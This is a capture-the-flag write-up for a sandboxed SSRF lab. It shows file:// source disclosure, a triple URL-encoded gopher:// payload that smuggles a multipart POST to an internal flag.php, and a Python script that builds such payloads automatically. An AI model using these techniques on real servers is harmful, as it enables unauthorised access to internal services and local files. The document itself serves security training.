Hint
This time you need to upload a file to flag.php. I have prepared a 302.php that may be useful. Good luck.
Solution
- Following the hint, visit flag.php and 302.php in turn through the SSRF endpoint:
http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/302.php
- flag.php turns out to be a file-upload form, but the form has no submit button.
- Edit the front-end page to add a submit button:
[screenshots: 1.png, 2.png]
- First, read the source of flag.php. The SSRF endpoint accepts the file:// scheme, so the script can be read straight from the web root:
Request:
GET /?url=file:///var/www/html/flag.php HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Response:
HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Sat, 31 Oct 2020 07:10:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 356
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *
<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>
Upload Webshell
<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>
- So flag.php checks only two things: REMOTE_ADDR must be 127.0.0.1 (the SSRF already satisfies this, since the form was served instead of "Just View From 127.0.0.1"), and a non-empty file part named "file" must be present. It then prints the CTFHUB environment variable, which holds the flag. The file is never saved, so its name and content are irrelevant; only a non-zero size matters.
- Upload any non-empty file through the patched form and capture the request (here haha.txt, containing 哈哈哈哈). Sent straight from the browser to /flag.php, this POST does not come from 127.0.0.1 as far as flag.php is concerned, so it cannot return the flag by itself; its only purpose is to obtain a well-formed multipart request to replay through gopher:
POST /flag.php HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
Content-Type: multipart/form-data; boundary=---------------------------173052974622637
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------173052974622637
Content-Disposition: form-data; name="file"; filename="haha.txt"
Content-Type: text/plain
哈哈哈哈
-----------------------------173052974622637
Content-Disposition: form-data; name="submit"
提交查询
-----------------------------173052974622637--
- URL-encode the captured request once, then replace every %0A with %0D%0A: HTTP requires CRLF line endings, and the captured text only had LF. (Note that the Chinese text got re-encoded along the way: each 哈 appears as %C3%A5%C2%93%C2%88, six bytes instead of the three the capture carried, so the body is 24 bytes longer than the Content-Length: 311 it still declares. The file part is complete within those 311 bytes and flag.php only checks that it is non-empty, so the check still passes here; in general, recompute Content-Length after any change to the body.)
POST%20/flag.php%20HTTP/1.1%0D%0AHost%3A%20challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20WOW64%3B%20rv%3A68.0%29%20Gecko/20100101%20Firefox/68.0%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AReferer%3A%20http%3A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%3A10080/%3Furl%3D127.0.0.1/flag.php%0D%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D---------------------------173052974622637%0D%0AContent-Length%3A%20311%0D%0AConnection%3A%20close%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0A%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22haha.txt%22%0D%0AContent-Type%3A%20text/plain%0D%0A%0D%0A%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%C3%A5%C2%93%C2%88%0D%0A-----------------------------173052974622637%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22submit%22%0D%0A%0D%0A%C3%A6%C2%8F%C2%90%C3%A4%C2%BA%C2%A4%C3%A6%C2%9F%C2%A5%C3%A8%C2%AF%C2%A2%0D%0A-----------------------------173052974622637--
- Then URL-encode the result twice more:
POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637--
- Assemble the final payload and send it as a GET. The request is nested: the outer ?url= makes the server fetch 127.0.0.1/index.php?url=gopher://..., the inner index.php then fetches the gopher URL, and the decoded gopher selector is written to port 80 as a raw HTTP request. Each ?url= parameter is URL-decoded once by PHP, and the gopher selector is decoded once more when it is sent, which is why the request had to be encoded three times:
GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520WOW64%25253B%252520rv%25253A68.0%252529%252520Gecko/20100101%252520Firefox/68.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AReferer%25253A%252520http%25253A//challenge-5a05d44ccb194622.sandbox.ctfhub.com%25253A10080/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------173052974622637%25250D%25250AContent-Length%25253A%252520311%25250D%25250AConnection%25253A%252520close%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522haha.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%2525C3%2525A5%2525C2%252593%2525C2%252588%25250D%25250A-----------------------------173052974622637%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525C3%2525A6%2525C2%25258F%2525C2%252590%2525C3%2525A4%2525C2%2525BA%2525C2%2525A4%2525C3%2525A6%2525C2%25259F%2525C2%2525A5%2525C3%2525A8%2525C2%2525AF%2525C2%2525A2%25250D%25250A-----------------------------173052974622637-- HTTP/1.1
Host: challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
- The response carries the flag. The outer 200 OK comes from the SSRF endpoint (openresty); its body is the raw response that flag.php, behind Apache, returned to the gopher request:
HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Sat, 31 Oct 2020 07:32:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 241
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *
HTTP/1.1 200 OK
Date: Sat, 31 Oct 2020 07:32:30 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/5.6.40
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8
ctfhub{562a1f1288bed76e4fb1b639c74d1cd24653d7b1}
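To make the manual encoding steps above reproducible, here is an added example (my own code, not part of the original write-up or of CTFHub). It builds a minimal multipart POST for flag.php with CRLF line endings and a Content-Length computed from the actual body, then percent-encodes the request once per decoding hop and wraps it in gopher://. The boundary string, the file content and all function names are constructed for illustration; the target 127.0.0.1:80, the path /flag.php and the three-hop chain (outer ?url=, inner index.php ?url=, gopher selector) follow the write-up. It assumes the SSRF fetcher behaves like curl, which percent-decodes the gopher selector before sending it.

```python
"""Build the gopher:// SSRF payload from the write-up programmatically.

Added example, not code from the original write-up or from CTFHub. The
boundary, file content and helper names are constructed for illustration;
host, port, path and the three decoding hops follow the write-up.
"""
from urllib.parse import quote, unquote, unquote_to_bytes


def build_multipart(boundary: str, field: str, filename: str, content: bytes,
                    content_type: str = "text/plain") -> bytes:
    """Return a multipart/form-data body with a single file part.

    Every line ends in CRLF, as HTTP requires; the LF-only capture in the
    write-up had to be patched by hand (%0A -> %0D%0A)."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def build_post(host: str, path: str, body: bytes, boundary: str) -> bytes:
    """Raw HTTP/1.1 POST. Content-Length is computed from the real body, so it
    stays correct however the body is encoded afterwards."""
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()
    return headers + body


def gopher_payload(raw_request: bytes, target: str = "127.0.0.1", port: int = 80,
                   decode_hops: int = 1) -> str:
    """Wrap a raw request as gopher://target:port/_<encoded request>.

    The gopher client (assumed to be curl) percent-decodes the selector once
    before writing it to the socket, and every ?url= parameter the payload
    passes through is decoded once more by PHP, so the request is encoded once
    per hop. The write-up's chain (outer ?url= -> inner index.php ?url= ->
    gopher) is decode_hops=3. Every byte, including '/' and CR/LF, is encoded."""
    if decode_hops < 1:
        raise ValueError("at least one decoding hop (the gopher selector itself)")
    encoded = quote(raw_request, safe="")
    for _ in range(decode_hops - 1):
        encoded = quote(encoded, safe="")
    return f"gopher://{target}:{port}/_{encoded}"


def simulate_hops(payload: str, decode_hops: int) -> bytes:
    """Undo the encoding the way the hops will: decode once per hop and return
    the exact bytes that reach the target socket. Check this before firing."""
    selector = payload.split("/_", 1)[1]
    for _ in range(decode_hops - 1):
        selector = unquote(selector)
    return unquote_to_bytes(selector)


def ssrf_url(base: str, payload: str) -> str:
    """The outer GET the browser sends; the inner hop is
    127.0.0.1/index.php?url= as in the write-up."""
    return f"{base}/?url=127.0.0.1/index.php?url={payload}"


if __name__ == "__main__":
    boundary = "----ssrf-example-boundary"  # constructed, not the Burp one
    body = build_multipart(boundary, "file", "haha.txt", "哈哈哈哈".encode("utf-8"))
    request = build_post("127.0.0.1", "/flag.php", body, boundary)
    payload = gopher_payload(request, decode_hops=3)
    assert simulate_hops(payload, 3) == request
    print(ssrf_url("http://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080", payload))
```

Running the script prints the complete GET URL for the challenge host. simulate_hops() decodes the payload the same number of times the chain will, so the exact bytes that reach port 80 can be confirmed before anything is sent; the browser headers from the capture (User-Agent, Accept, Referer) are left out because flag.php never reads them.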